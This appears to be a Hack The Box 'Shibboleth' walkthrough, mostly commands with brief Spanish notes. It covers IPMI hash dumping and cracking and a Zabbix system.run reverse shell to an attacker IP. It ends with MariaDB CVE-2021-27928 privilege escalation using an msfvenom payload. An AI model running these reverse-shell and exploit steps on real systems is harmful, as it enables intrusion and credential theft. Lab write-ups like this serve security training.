nmap -A -p- -oA shibboleth 10.129.188.117 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA shibboleth 10.129.188.117

nmap -sU -O -p- -oA shibboleth-udp 10.129.188.117

nikto -h 10.129.188.117:8500

gobuster vhost -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt" -u "shibboleth.htb" -r


Pasted image 20211128131144.png

msfconsole
use auxiliary/scanner/ipmi/ipmi_dumphashes
set rhosts monitor.shibboleth.htb
run

Administrator:68f06f1e82010000b5ae67010aa2771364c8e73cd9baefa356ab685edbaf53a462ad2febc0822661a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:e2c24922308e07c7fccde5dc8820b124b70fac61

hashcat -m 7300 -a 0 hash.txt /usr/share/wordlists/rockyou.txt -o hash --potfile-disable -D 1 --force

Nos dirigimos a http://monitor.shibboleth.htb/ e iniciamos sesión con las credenciales Administrator : ilovepumkinpie1 (la contraseña recuperada con hashcat a partir del hash IPMI anterior).

Configuration-> Items

Pasted image 20211128131447.png

system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.65 443 >/tmp/f &,nowait]

nc -lvnp 443

Pasted image 20211128132320.png

Le damos clic a Test y después a Get value and test.

Pasted image 20211128132725.png

python3 -c 'import pty; pty.spawn("/bin/bash")'

cat /etc/passwd

Pasted image 20211128133115.png

su ipmi-svc
ilovepumkinpie1

Pasted image 20211128133627.png

cat /etc/zabbix/zabbix_server.conf | grep DB

Pasted image 20211128133538.png

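https://github.com/Al1ex/CVE-2021-27928

CVE-2021-27928: en versiones vulnerables de MariaDB, un usuario de base de datos con privilegio SUPER puede ejecutar comandos del sistema operativo modificando la variable wsrep_provider. Se corrige actualizando MariaDB a una versión parcheada y limitando qué cuentas tienen ese privilegio.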

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.x.x LPORT=4444 -f elf-so -o shell.so

Pasted image 20211128134905.png

nc -lvnp 4444

python3 -m http.server 80

wget http://10.10.x.x/shell.so

Pasted image 20211128135104.png

mysql -h localhost -D zabbix -u zabbix -p'bloooarskybluh'

SET GLOBAL wsrep_provider="/tmp/shell.so";

Pasted image 20211128135729.png
